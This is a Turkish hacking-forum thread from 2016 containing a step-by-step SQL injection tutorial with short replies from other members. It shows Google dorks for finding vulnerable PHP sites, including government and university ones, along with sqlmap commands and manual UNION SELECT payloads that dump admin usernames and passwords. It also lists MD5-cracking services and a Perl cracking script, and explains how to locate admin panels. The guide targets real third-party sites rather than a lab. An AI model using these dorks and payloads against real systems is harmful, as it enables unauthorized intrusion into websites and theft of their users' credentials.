THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

// SQL Açığı En Temelden Tüm Yöntemlerine // AquieLL

AquieLL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
aquu.php
Mesajlar:
4.007
Konular:
629
Teşekkür (Etti):
818
Teşekkür (Aldı):
2308
Ticaret:
(0) %
11-01-2016 18:54
#1
// SQL Açığı En Temelden Tüm Yöntemlerine // AquieLL
Herkese Merhaba Millet Ben AquieLL , Yeni Bir Konu İle Karşınızdayım.


İçindekiler :
1-)SQL Dork Nasıl Yazılır ?

2-)Sitenin SQL Açıklı Olduğu Nereden Anlaşılır ?

3-)SQL Açıklı Bir Sitenin Database Bilgileri Nasıl Çekilir ?
-Havij 1.16 PRO
-SQLMAP
-Manuel

4-)Sitenin Database Bilgilerinden Çıkan MD5 Nasıl Çözülür ?
-Bazı Siteler Yardımı
-Perl Yöntemi

5-)Sitenin Admin Paneli Nasıl Bulunur ?
-İntelli Tamper
-Admin Panel Bulucular
-Perl Yöntemi

*****************************************


Konu : Doğru SQL Dork Yazımı Ve Kullanımı

1-)Kelime Belirme :

Arkadaşlar Öncelikle Aklınızdan Bir Kelime Tutun.Ama Bu Kelime Güzel İnternet Aleminde Gerçekten Kullanılan bir Kelime Olmalı.Basit Kelimelerden Kaçının Brute'de Nasıl Günlük Hayatta Kullanılan Kelimeler Kullanılıyorsa Bunda'da Öyle Düşünün.

Örnek Olarak Ben " Teknoloji " Kelimesini Seçtim


Kod:
Teknoloji
2-)Sitenin Hangi Dilde Yazılmış Olduğuna Karar Veriniz.

SQL Açıklar İçin " ASP " veya " PHP " Çok Kullanılan Bir Dildir.Hangi Dilde Yazmak İstediğinizi Seçmeniz Gerekiyor.İki Dilde'de Gerçek'den Doğru Kullanılırsa Güzel Sonuçlar Alacaksınız.

Örnek Olarak Ben " PHP " Dilini Seçtim.


Kod:
PHP
Hadi O Zaman İlk Dorkumuzu Yazalım

Kod:
inurl:technology.php?id=
İlk Dorkumuz Bu Şekilde Bu Dork Sizlere " PHP Dilinde Yazılmış Teknoloji " Sitelerini Verecektir.

Hadi O Zaman Dorkumuzu Bir Tık Daha Geliştirelim.

3-)Dorka Hedef Bir Ülke Ekleyelim. ( Zorunlu Değil Tabi İsterseniz.)

İlk Olarak Dorkumuzu Hatırlayalım.

Kod:
inurl:technology.php?id=
Şimdi Bu Dork Üzerinde Nasıl Hedef Ülke Ekleyebiliriz Onu Öğrenelim.

Örnek Olarak Ben İtalyayı Alacağım.


Kod:
inurl:technology.php?id= site:.it
Arkadaşlar Bu Dork Bizlere " İtalyanın PHP Dilinde Yazılmış Teknoloji Sitelerini Verecektir."

Evet Dorkumuzun Sonuna "site:.ülkeuzantısı" Şeklinde Ekliyoruz.Tabi ki Ben Örnek Olarak İtalyayı Aldım.Siz Değiştirebilirsiniz.


Örnek :
Kod:
inurl:technology.php?id= site:.it (Fransa)
inurl:technology.php?id= site:.de (Almanya)
inurl:technology.php?id= site:.in (Hindistan)
inurl:technology.php?id= site:.vn (Vietnam)
inurl:technology.php?id= site:.lt (Litvanya)
inurl:technology.php?id= site:.ru (Rusya)
4-)Dork'a .edu veya .gov Ekleyebilirsiniz ( Zorunlu Değil Tabi İsterseniz.)

+.edu Nedir ?
-Edu Üniversite Siteleri Link Uzantısıdır.

+.gov Nedir ?
-Gov Devlet Siteleri Link Uzantısıdır.

İlk Olarak Bizim Dorkumuz Neydi Hatırlayalım .

Kod:
inurl:technology.php?id=
Arkadaşlar Şimdi Bu Dork'a ".edu" Ekleyelim.

Kod:
inurl:technology.php?id= ".edu"
Açıklama : Arkadaşlar Üstteki Dork Bize " PHP Dilinde Yazılmış Üniversitenin Teknoloji Bölümü " Sitelerinin Linklerini Verecektir.

Arkadaşlar Şimdi Dork'a ".gov" Ekleyelim.

Kod:
inurl:technology.php?id= ".gov"
Açıklama : Arkadaşlar Üstteki Dork Bize " PHP Dilinde Yazılmış Devlet Sitelerinin Teknoloji Bölümü " Sitelerinin Linklerini Verecektir.

*****************************************

Konu : Sitenin SQL Açıklı Olduğu Nasıl Anlaşılır ?

ÖRN:www.örneksitemiz.com/newsDetail.php?id=12
>>
id=12'
>>
id=12'nin Yanına tek tırnak (') Koyuyoruz.

Site Hata Verirse SQL Açıklıdır.
Site Hata Vermezse SQL Açıklı Değildir.


*****************************************

Konu : SQL Açıklı Bir Site'nin Database'si Nasıl Çekilir ?

#1 HAVİJ 1.16 PRO :

+HAVİJ AÇIYORUZ TARGET YAZAN YERE SİTE ADRESİMİZİ YAZIYORUZ.


+Sitemizi Yazdıktan Sonra " Analyze " Tuşuna Basıyoruz.


+Bekliyoruz...


+Tables Diyoruz ve Databasemizi Seçiyoruz.


+Databesemizi Seçtikten Sonra " Tables >> Get Tables " Diyoruz.


+Bilgilerimiz Geliyor...


+Gelen Bilgilerden " USER " Seçiyoruz.


+User Seçtikten Sonra >> " get columns " diyoruz.


+Yeni Bilgiler Geliyor Bize Lazım Olan " ADMİN(username) VE PASSWORD " SEÇİYORUZ.


+ADMİN(USERNAME) VE PASSWORD SEÇTİKTEN SONRA >> " GET DATA " DİYORUZ.


+Ve İstediğimiz Bilgiler Çekiliyor ..



#2 SQLMAP Yöntemi :

KONU : Windows SQLMAP Hacking // AquieLL

+Gerekli Malzemeler Nelerdir ?
-Phyton 2.7.8
sqlmap Dosyası.


+Kurulumu Nasıl Olur ?
-Phyton 2.7.8'i İndirerek Setup'dan Bilgisayarımıza Kuruyoruz.
-Daha Sonra " sqlmap " Adlı Dosyayı Bilgisayarım >> Yerel Disk C:// >> Bölümüne Atıyoruz.

+Program Linkleri : (Veteran 7 Hocamın Upload'ı )

// HACK Aşamaları //

Elimizde Bir Adet SQL Açıklı Bir Site Olduğunu Farz Ediyoruz.

Kod:
http://www.örneksite.com/news.php?id=10
1-)CMD Açıyoruz .

2-)C://sqlmap Klasör'üne İnelim. Tek Tek Yazıyoruz.

Kod:
cd..
Kod:
cd..
cd sqlmap
3-)Sitenin Database'sine Giriş Yapalım.

Kod:
sqlmap.py -u sqlaçıklıurl --dbs
Not: Bu İşlemden Sonra [Y/n] Sorusu Gelecek. Hepsine Y Deyip Enterliyoruz.

4-)Sitenin Tablolarını Çekelim.

Kod:
sqlmap.py -u sqlacikliurl veritabaniadi --tables
5-)Tablomuzun Kolonlarını Çekelim. Hangi Kolon'u Çekmek İstiyorsanız Onu Yazacaksınız.

Kod:
sqlmap.py -u sqlacikliurl -D veritabani adi -T tablo adi --columns
6-)Çektiğimiz Kolondaki User Login Girişi Artık Neyse Onu Çekeceksiniz.

Kod:
sqlmap.py -u sqlacikliurl -D veritabani adi -T tablo adi -C column adi --dump


#3 Manual SQL İnjection

Başlayalım...

Elimizde Bir Site Var SQL Açıklı Olup Olmadığını Anlamak İçin İD=1 değerinin Sonuna " 'a " Ekliyoruz.
Karşımıza Şöyle Bir Hata Benzeri Bir Hata Çıkarsa Site SQL Açıklı Bir Sitedir.
Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Kod:
www.örneksite.com/hack.php?id=1
Biz SQL Hatamızı Aldık ve İlk Aşamamız Siteye "+order+by+ "
Komutunu Çalıştırmaktır. Hangi Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Sayıdır.

Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim. Yani ;

Kod:
www.örneksite.com/hack.php?id=1+order+by+1 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+2 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+3 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+4 (SQL Hatamız Kalktı.
Kod:
www.örneksite.com/hack.php?id=1+order+by+5 (Hala SQL Hatası Var)
Böylece Kolon Sayımızın 4 Olduğunu Bulduk.

Şimdiki Aşamamız Siteye "+union+all+select" Komutunu Çalıştırmaktır.İd Değerinin Sonuna Kolon Sayımız 4 Olduğu İçin
Site Sonunu 4'e Kadar Yazıyoruz."+union+all+select+1,2,3,4" yani ;

Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,2,3,4
Şurada Kolon Sayısından Sonrasına : (Yani 4'den Sonrasına) " -- " Koyuyoruz.
İD Değerinden Öncesine : ( Yani İD=1'den Öncesine " id=-1 "

Kod:
www.örneksite.com/hack.php?id=-1+union+all+select+1,2,3,4--
Şimdi Ekrana Bir Sayı Çıkacak.Mesela 2 Sayısı Ekrana Geldi Site URL'mizde ;
2 Sayısının Yerine = group_concat(table_name)
Url En Sonuna'da = +from+information_schema.tables+where+table_schema =database()

NOT:Ekranda Sayıları Gördükten Sonra " -- " ve " - " İşaretlerini Siliyoruz.
Yani ;

Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()
Ekrana Tableler Gelicek,Bize Şuradan admin,adminuser gibi tableler Lazım olucak,mesela admin seçelim..
Şimdi Sitenin Sonuna Yazdığımız Kodu Şöyle Değişelim:

Kod:
+union+all+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(hacklenmiş table kodu)--
Şimdi Tabloları Hacklemek İçin Bir Site'den Yardım Alacağız
Site: https://www.easycalculation.com/ascii-hex.php

Hacklemek İstediğimiz Tablo İsmini String Bölümüne Yazıyoruz.Admini Seçtiğimiz İçin Biz Admin Yazacağız. Yazdık Ve Bize kodu Verdi.

KOD : 97 100 109 105 110



Ve Artık Site Sonuna Yazacağımız Kod Şöyle Oluyor ;

Kod:
+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+seçdiğimiz table--
Bizim Seçdiğimiz Table admin Tablesi Olduğu İçin Kod Şöyle Oluyor.
Not:Şunuda Söyleyelimki login ve pass Arasında Yazdığımız 0x3a "," demek Ve Onu Mutlaka Yazmalısınız.

Ve Son Kodumuzu Yazıyoruz ve Admin Bilgileri Ekrana Geliyor... ;

Kod:
+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin--
ve TAM Siteli Olan Hali ;
Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin--

*****************************************

Konu : Sitenin Database'sinden Çıkan MD5 Nasıl Çözülür ?

#1 Bazı Siteler Yardımıyla :

Bu Sitelerdeki Textbox Yazı Bölümüne MD5'i Girin ve Sonucu Alın.

Kod:
http://www.hashkiller.co.uk
http://md5cracker.org
http://tr.freemd5.com
http://md5.rednoize.com/
http://www.md5decrypter.co.uk/
http://md5cracker.org/
http://www.md5crack.com/
http://www.md5this.com/
http://www.cmd5.org/
http://www.tobtu.com/md5.php
http://cracker.fox21.at/
http://www.hash-cracker.com/
http://www.md5decrypter.com/
http://www.xmd5.org/
http://www.hash-database.net/
http://www.md5-hash.com/
#2 Perl Yöntemi :

Aşama Aşama Vereceğim. Daha Kolay Anlaşılsın.

1-)Arkadaşlar İlk Olarak Perl Dosyalarını Okuyabilmek İçin İnternetten " Active Perl " İndiriniz.

2-)Programı "C://" Dizinine Kurun.

3-)Bu Exploit'i İndirin ( Virüs Total ve Link Aşağıda Olacak)

4-)C:// Dizisinden >> Perl >> bin

Bölümüne "md5 adlı exploit" atın

5-)Cmd Açın

6-)Şu Kodları Yazarak "MD5.PL" dizinine Kadar İnelim. ve Programı Çalıştıralım.

Kod:
cd..
cd..
cd perl 
cd bin
perl md5.pl
7-)Console Application Ekrana Geldi.
C:\Perl\bin> Yazan Yere Şunu Yazıyoruz.

Kod:
perl md5.pl aAd 1 99 x (x nedir diyenler için bulduğunuz md5 şifresini buraya yazın.)

+ peki 1 99 aAd Nedir ?
-aAd Yazarsak Aşağıdaki İşlemlerin harf , büyük harf , numaralar tercih olan bölümüdür. 1 den 99'a kadar sayıları tarar.
Siz Kendinize Göre'de Ayarlayabilirsiniz. aAd Tavsiyedir.

Kod:
a = harfler olsun
A = büyük harfler olsun
d = numaralar olsun
x = işaretler olsun
aAdx = hepsi olsun


[/SIZE][/B]

[B][SIZE="2"][COLOR="Orange"]*****************************************

Konu : Sitenin Admin Paneli Nasıl Bulunur ?

#1 ROBOTS.TX VE SİTEMAP:XML:

a-)Robots.txt ve Sitemap.xml : Arkadaşlar Bu Tüm Siteler'de Olmasada Bazen Başarılı Sonuç Veriyor Peki Ne Yapacağız ?

Sitenin Sonuna ;
Kod:
http://www.hedefsite.com/robots.txt
http://www.hedefsite.com/sitemap.xml
#2 ADMİN Panel Bulucular :

b-)Admin Panel Bulucular : Bu Yazılımcı Arkadaşlarımızın Kodladığı Programlardır.

Kullanımı :
1-)Adres Bölümüne Siteyi Yaz.

2-)Admin Listelerini Programa Yükle

3-)Taramayı Başlat

4-)Bulursa Orda Size Gözükecektir.


Örnek Bir Proje Amy-Root Yapmış



#3 İNTELLİ TAMPER :

3-)İntelli Tamper : Bu Program Sitenin Verilerini Çekerek. Admin Panelini Bulmaya Yarar.

Kullanımı :
1-)" Adress " Yazan Yere Site Linki'ni Yaz.

2-) Üst Menüler'den " File " >> " Start Scan " Bas.

3-)Tarama Başladı.

4-)Veriler Tek Tek İnmeye Başladı.

5-)Arkadaşlar İnen Veriler'den " Admin " Adlı Dosya'ya Basıyoruz .

6-)Sağ Taraftaki Menüler'den AdminPanel.html Dosyasına Gidiyoruz.


Ek Video : https://www.youtube.com/watch?v=6GDh8FHTi7o


Saygılarımla AquieLL

NOT ! : Aralarda Kod Kayması Olabilir Çok Fazla Renklendirme Vb Kodlarla Uğraştığım İçin Arada Boş Kod Parçası Olabilir Takmayın
---------------------

WWW.TÜRKHACKTEAM.ORG/TV
- AquieLL -
Siber Güvenlik


Konu AquieLL tarafından (13-01-2016 16:59 Saat 16:59 ) değiştirilmiştir.
qRunt2 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2015
Mesajlar:
1.712
Konular:
119
Teşekkür (Etti):
830
Teşekkür (Aldı):
647
Ticaret:
(0) %
11-01-2016 18:59
#2
Eline sağlık Aquu
--------------------- '' Beklenen hep geç geliyor; geldiği zaman da insan başka yerlerde oluyor. ''
OĞUZ ATAY


"Masallar albayım... Bu dünyada sonu mutlu biten tek şey onlar..."
AquieLL, trkhshck Teşekkür etti.
CroosingPower - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2015
Nereden:
Türkiye.
Mesajlar:
141
Konular:
10
Teşekkür (Etti):
8
Teşekkür (Aldı):
17
Ticaret:
(0) %
11-01-2016 19:04
#3
Elinize sağlık konu harika sqlmap da level risk waf vb kodları da açıklayiniz süper olacaktır manuel de order by 100 yazıyorum hata yok 1 yazıyorum yok sonuna -- ekliyorum ama olmuyor yardım eder misiniz
---------------------
Yeni Efsanenin Başlangıcı
Croosing~Power,Kroosing~Power
AquieLL Teşekkür etti.
sin4n - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2015
Nereden:
Turkey
Mesajlar:
384
Konular:
62
Teşekkür (Etti):
33
Teşekkür (Aldı):
91
Ticaret:
(0) %
11-01-2016 19:05
#4
Ellerine sağlik
---------------------
Savaşı zenginler çıkarır fakirler ölür
AquieLL Teşekkür etti.
alpoha19 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2015
Mesajlar:
1.549
Konular:
192
Teşekkür (Etti):
1040
Teşekkür (Aldı):
662
Ticaret:
(0) %
11-01-2016 19:06
#5
Yorumum mi silindi banami ole geliyor?
AquieLL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
aquu.php
Mesajlar:
4.007
Konular:
629
Teşekkür (Etti):
818
Teşekkür (Aldı):
2308
Ticaret:
(0) %
11-01-2016 19:11
#6
Teşekkürler Arkadaşlar. Evet Silinmiş Alpoha.
---------------------

WWW.TÜRKHACKTEAM.ORG/TV
- AquieLL -
Siber Güvenlik


egecoast - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Mesajlar:
244
Konular:
42
Teşekkür (Etti):
60
Teşekkür (Aldı):
34
Ticaret:
(0) %
11-01-2016 19:11
#7
Eline Sağlık
--------------------- En haksız barışı, en adil savaşa tercih ederim
OmerDRN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2015
Nereden:
Studio_7
Yaş:
22
Mesajlar:
554
Konular:
73
Teşekkür (Etti):
86
Teşekkür (Aldı):
152
Ticaret:
(0) %
11-01-2016 19:14
#8
Eline sağlık dostum.
Centos 8 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2015
Nereden:
İstanbul
Mesajlar:
1.053
Konular:
103
Teşekkür (Etti):
635
Teşekkür (Aldı):
174
Ticaret:
(0) %
11-01-2016 19:22
#9
Vaaaaay
Brett - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
559
Konular:
73
Teşekkür (Etti):
92
Teşekkür (Aldı):
185
Ticaret:
(0) %
11-01-2016 19:24
#10
Çok detaylı ellerine sağlık.
--------------------- No System İs Safe!

Giantai

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler